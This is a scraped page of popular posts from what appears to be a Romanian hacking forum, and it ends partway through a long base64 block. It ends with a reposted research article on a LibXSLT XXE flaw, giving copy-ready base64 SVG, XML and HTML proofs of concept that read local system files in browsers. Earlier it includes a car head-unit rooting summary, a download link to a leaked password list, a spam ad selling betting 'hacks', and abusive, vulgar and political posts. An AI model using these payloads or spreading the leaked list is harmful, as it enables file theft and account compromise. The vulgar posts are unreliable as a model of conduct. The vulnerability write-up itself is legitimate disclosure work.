If you didn't follow it all the way, here's a summary: I used a Raspberry Pi in USB gadget mode to simulate an Android device connected to the head unit. The head unit thinks it's accepting a navigation maps update from the "phone", but because the update protocol allows for arbitrary file changes, I can issue commands to modify a specific file and inject a call to a bash script that gets run as root. Code Please Everything is on GitHub with more detailed instructions (it contains no proprietary code). The key pieces are my implementation of the "nftp" protocol and the gadget configuration. What's Next? This is just the beginning, now it's time to really explore the system. First, I'll probably end up restoring the autorun.sh functionality, with a custom service, because I think that's the easiest way to load software. That way I can keep all the new stuff on the drive and make as few changes to the system as possible. One of the main things I would like to do is record car parameters, stuff like speed, fuel, location etc. It remains to be seen if I can easily access that information through D-Bus, or if I need to go deeper. I'm not interested in adding anything that requires my attention while driving. But that's for another time... Some Extras (Could I have used SSH?) Two ports are open by default on the head unit, an SSH server, and some Apple service, probably related to CarPlay (Server: AirTunes/320.17.6), I didn't really explore that. But I tried cracking the /etc/shadow root password from the update file using hashcat / john with some rules and password lists. I'm not an expert doing this at all, I don't even know if I was doing it right, and was not successful. Not that it matters now, I could just change the root password or add a new user. SSH on port 22 / AirTunes/320.17.6 on port 7000 Sursa: https://goncalomb.com/blog/2024/01/30/f57cf19b-how-i-also-hacked-my-car
    5 points
  17. In lumea noastra, la specimene de genul le spunem escroci. Ei se considera hackeri 🤣 Ma bucur ca ai pus titlul prin care iti faci descrierea, fie ea si putin eronata. Lasa-ne ma nene cu sfaturi dinastea. Vezi-ti de banii tai, de cartela ta reincarcabila de la vodafone sau ce valori consideri tu ca ai. Pentru noi esti doar un tomberon de gunoi.
    5 points
  18. Nu merita sa se ajunga la burnout din niciun punct de vedere: 1. Manageru nu sta cu cutitu la gatul tau sa te ameninte ca te taie daca nu faci un task 2. Overtime sau stres acceptat e doar 2-3 ore la minim cateva luni cand se intampla ceva "critic" (pentru firma) 3. Si daca se intampla ceva critic pentru firma, nu e firma mea, poate sa crape, exista mii de locuri in IT platite in cel mai rau caz "asemanator" 4. Balanta work-life cum apare in mediul corporate si-o face fiecare individ in parte. Eu imi pun in Outlook ca ma duc sa ma tund (sa nu fiu deranjat :D). Daca e vorba de mers la un medic, indiferent cat de neimportant e (gen analize uzuale sau ma doare un picior) plec de la munca fara sa imi pese de ce se intampla (e.g. sedinte sau alte mizerii mai putin importante ca sanatatea mea) 5. Nu mai apare burnout cand angajatii realizeaza ca firma aia pentru care lucreaza nu e cel mai important lucru pentru ei si ca se pot lipsi oricand de ea
    5 points
  19. Sunt patit cu burnout-ul din mediul corporate. Cele mai frecvente cauze sunt task-urile multiple cu deadline-uri nerealiste sau proiecte mai mari din care faci parte cu oameni care nu au treaba cu domeniul. Cateva exemple din ce am patit: "Suntem la mijlocul lunii, ai un POC facut, livreaza tot proiectul pana la sfarsitul lunii si dupa corectezi ce erori apar". Inchizi pe ziua respectiva si iti scrie managerul "pana pleci, fa te rog si task-ul asta". Ii zici ca faci maine si iti raspunde cu "Ar fi mai ok azi" Explici la colegii tai cum trebuie sa faca o anumita chestie si urmatoarea zi te intreaba acelasi lucru si se repeta procesul pe cateva luni Burn out-ul nu apare dintr-o data. La un moment dat ti se aduna toata frustrarea si incepi sa devii agresiv, in special cu colegii fara experienta. In momentul in care realizezi ca esti burnt out, in primul rand trebuie sa vezi de unde iti vine si sa incerci sa rezolvi. stai peste program sa rezolvi orice chestie care putea sa ramana pe urmatoarea zi => inchizi la ora care termini, sa fii team player nu inseamna sa faci voluntariat si tot tu pierzi nu trebuie sa fii conectat non-stop la Slack/Teams/etc., decat daca esti pe o rotatie "on call" si si atunci te suna cineva din companie daca te simti burnt out, scoate Slack, Teams sau ce aplicatie foloseste compania ta de pe telefonul personal (vezi sa nu scoti si aplicatia de MFA) ai caz de forta majora (ex. Crowdstrike) => da, stai peste program si notezi cat ai stat ca OT ai un manager care iti promite multe si nu se intampla => foloseste-te de ce resurse ai la companie ca sa-ti imbunatatesti CV-ul (cursuri, diplome, conferinte platite de companie) si gaseste-ti intre timp alt job. In ziua de azi, in special in mediul corporate, nu te ajuta loialitatea la absolut nimic te intreaba lumea cum sa faca una sau alta => fa un guideline, prezinta-l intr-un call trimis la distribution list, daca tot te intreaba, trimite-i la guideline Un alt lucru important, in special in IT, nu te grabi sa livrezi ceva. Da un deadline 2x / 3x fata de cat ai estima ca ar dura. Daca livrezi rapid, o sa te incarce de task-uri de nu o sa mai stii de tine. Daca lucrezi remote, uita-te la un film, joaca ceva, fa curatenie prin casa, spala vasele, nu te grabi sa livrezi o gramada de chestii pentru ca o sa te tina minte managerul si o sa-ti dea mult mai multe de facut pe aceeasi bani.
    5 points
  20. Am lasat vorba in familie ca vreau sa fiu mancat atunci cand voi muri. Tie iti va reveni pula mea. Pofta buna.
    5 points
  21. Have funk! https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
    5 points
  22. Hai ca poate lucreaza ptr o companie in securitate si au dezvoltat si ei o campanie de phishing interna, si au nevoie de niste pagini.
    5 points
  23. Asculta careva de aici? https://darknetdiaries.com/episode/28/ Israel has their own version of the NSA called Unit 8200. Listen along to learn what someone gets into the group, what they do, and what these members do once they leave the unit. Governments are hacking into other governments. They do it to steal secrets or find how many weapons they have, if they’re planning a strike, or if there’s anything else that might be a threat. Some nations are much more advanced at security than others. One country with advanced cyber-security capabilities is Israel. Prime Minister Benjamin Netanyahu.
    5 points
  24. mă culc plângând, mă trezesc plângând 😭
    5 points
  25. s-au gasit rusi la PNL. Naaa, muie la leftisti si creduli. Poporul asta are nevoie de un reset total
    4 points
  26. (refresh) ANAF a descoperit că PNL a plătit o campanie care l-a promovat masiv pe Călin Georgescu pe TikTok - Snoop Ai dreacu rusi au mai fost romanii astea.. 😂😂
    4 points
  27. E scam. Foloseste Hostinger ce accepta plati crypto pentru host, intrucat la whois nu iese privacy chipurile dar nici ei nu stiu defapt cine le ia serverul in primire pentru gazduire si nu cred ca ii intereseaza. E un serviciu olandez (culmea, nu?), poate unul din cele foarte putine de acest fel in Europa. IP-ul de server bineinteles ca e blacklisted si el, nu mai pun amatorismul in sine al site-ului. L.E: Totodata, atentie mare la renumitul site "ScamAdviser", la o analiza mai ampla facuta de mine acum vreun an, in spate se afla un soi de ONG-uri de tipul 'black african people can code too' si alte labe triste d'astea, ce sa vezi, sustinute tocmai de statul Olandez cu fonduri. Nu are nici dracu o pregatire acolo reala sa realizeze vreun sistem de detectie a unui scam, is cateva zeci de VPS-uri ce acceseaza un link si face niste estimari sparte'n PHP cel mai probabil. Prostii de la noi, ca asa e ei, prosti l-au prezentat imediat la stiri si emisiuni dedicate IT ca fiind vreun mare serviciu de baza anti-scam, in realitate, multe scam-uri au scor mare la ei pe site si daca continui sa sapi fara oboseala, ajungi la concluciza ca aia is sefii la scameri, aia mari nu oricare. ScamAdviser e cel mai grandios si inteligent scam posibil aparut in ultimii ani.
    4 points
  28. Campania lui CG a fost prea bine pusa la punct si el e prea retardat ca sa faca asa ceva. Cand el se plange de cezariana ca se rupe firul devin desi nevasta-sa a facut de 2 ori cezariana, cand zice ca apa contine informatii dar nu daca e imbuteliata, cand zice ca nu exista Covid ca nu l-a vazut nimeni, cand nevasta-sa zice sa porti fusta ca de jos vine energia in corp si o gramada de alte mizerii, incepi sa realizezi ca cea mai buna alegere e oricine altcineva.
    4 points
  29. S-a dus creditul de pe cartela reîncărcabilă 🤣 Luna viitoare cand produce 5.95 usd, ne viziteaza iar
    4 points
  30. Imediat iti zice ala ca te doare lombarul pentru ca nu ai pus o compresa cu teancuri de euro la el 🤣
    4 points
  31. da, exista, iar restul care zic sa renunti habar n-au despre ce vorbesc. A fost facut de ga0zchi, un membru de pe RSTCenter (actualul RSTForums). Se numeste Coailly si a fost postata o versiune beta aici pe forum, care mergea doar pe Betano si Princess. Calcula probabilitatile cu precizie de zece zecimale, deci mult peste ce ofera casele, care se limiteaza la doua zecimale. @black_death_c4t il are de vanzare, ii poti da un mesaj privat. @YKelyan sa-mi aduci aminte sa-mi iau 20 de lei in plus ca sa-ti dau de o apa anu' asta la DefCamp. hackuri betano, hackuri princess, hackuri 888casino, ponturi pariuri, hack aviator unibet
    4 points
  32. A year ago, I wondered what a malicious page with disabled JavaScript could do. I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled? Since I was too lazy to read the documentation, I started generating examples using ChatGPT. XSL The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data. In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example. system-properties.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet href="system-properties.xsl" type="text/xsl"?> <root/> system-properties.xsl <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <p> Version: <xsl:value-of select="system-property('xsl:version')" /> <br /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </p> </xsl:template> </xsl:stylesheet> Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome: The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications. The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios. get-location.xml <?xml-stylesheet href="get-location.xsl" type="text/xsl"?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test> <getLocation test="ent"/> </test> get-location.xsl <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > <xsl:output method="html"/> <xsl:template match="getLocation"> <input type="text" value="{unparsed-entity-uri(@test)}" /> </xsl:template> </xsl:stylesheet> Here is what you should see after uploading this code to your web server: All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”. XSL and Remote Content Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML. I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it. XML External Entities Since XSL is XML-based, usage of XML External Entities should be the first option. <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> XInclude XInclude is an XML add-on that’s described in a W3C Recommendation from November 15, 2006. <?xml version="1.0"?> <test xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/passwd"/> </test> XSL‘s <xsl:import> and <xsl:include> tags These tags can be used to load files as XSL stylesheets, according to ChatGPT. <?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:include href="file:///etc/passwd"/> <xsl:import href="file:///etc/passwd"/> </xsl:stylesheet> XSL’s document() function XSL’s document() function can be used for loading files as XML documents. <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:copy-of select="document('file:///etc/passwd')"/> </xsl:template> </xsl:stylesheet> XXE Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol. When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android! iOS + Safari Android + Chrome Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions. There was no chance that this wasn’t a vulnerability! Here is a photo of my Smart TV, where the file reading works as well: I compiled a table summarizing all my tests: The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user. Other Tests I have tested some applications that use LibXSLT and don’t have sandboxes. App Result PHP Applications that allow control over XSLTProcessor::importStylesheet data can be affected. XMLSEC The document() function did not allow http(s):// and data: URLs. Oracle The document() function did not allow http(s):// and data: URLs. PostgreSQL The document() function did not allow http(s):// and data: URLs. The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT. According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack. POCs You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later. First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them: The result of opening the xxe_all_tests/test.html page in an outdated Chrome Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights. As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding: Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article. poc.svg <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE svg [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <svg location="ent" /> poc.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test1 location="ent"/> poc.html <html> <head> <title>LibXSLT document() XXE tests</title> </head> <body> SVG<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlsZEdNdmNHRnpjM2RrSlRJeUpUTkZKVEl3SlRWRUpUTkZKVEJCSlRORGVIaGxKVE5GSlRCQkpUSTJlSGhsSlROQ0pUQkJKVE5ESlRKR2VIaGxKVE5GSnlraUx6NEtQQzlrYVhZK0Nqd3ZabTl5WldsbmJrOWlhbVZqZEQ0S1BDOXpkbWMrQ2p3dmVITnNPblJsYlhCc1lYUmxQZ284TDNoemJEcHpkSGxzWlhOb1pXVjBQZz09Ij8+CjwhRE9DVFlQRSBzdmcgWyAgCiAgICA8IUVOVElUWSBlbnQgU1lTVEVNICI/IiBOREFUQSBhYWE+ICAgCl0+CjxzdmcgbG9jYXRpb249ImVudCIgLz4="></iframe><br/> SVG WIN<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlqT2k5M2FXNWtiM2R6TDNONWMzUmxiUzVwYm1rbE1qSWxNMFVsTWpBbE5VUWxNMFVsTUVFbE0wTjRlR1VsTTBVbE1FRWxNalo0ZUdVbE0wSWxNRUVsTTBNbE1rWjRlR1VsTTBVbktTSXZQZ284TDJScGRqNEtQQzltYjNKbGFXZHVUMkpxWldOMFBnbzhMM04yWno0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0MSBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiIC8+"></iframe><br/> XML<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/> XML WIN<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQ